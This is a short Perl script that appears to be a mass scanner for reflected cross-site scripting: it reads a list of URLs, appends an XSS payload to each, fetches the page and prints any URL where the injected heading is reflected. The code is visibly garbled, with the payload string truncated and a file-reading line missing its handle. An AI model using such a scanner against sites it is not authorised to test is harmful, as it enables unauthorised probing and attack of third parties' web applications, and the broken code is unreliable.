#!/usr/bin/perl -w
use LWP::UserAgent;
my $ua = LWP::UserAgent->new();
my $payload = "\"/>XSS
";
my $html;
print "list --> ";
my $list = <>;
open(URLS, $list);
my @list = ;
close(URLS);
foreach $url(@list)
{
$html = $ua->get($url.$payload);
$html = $html->decoded_content;
if($html =~ m/\XSS\<\/h1\>/i)
{
print "$url is vulnerable\n";
}
}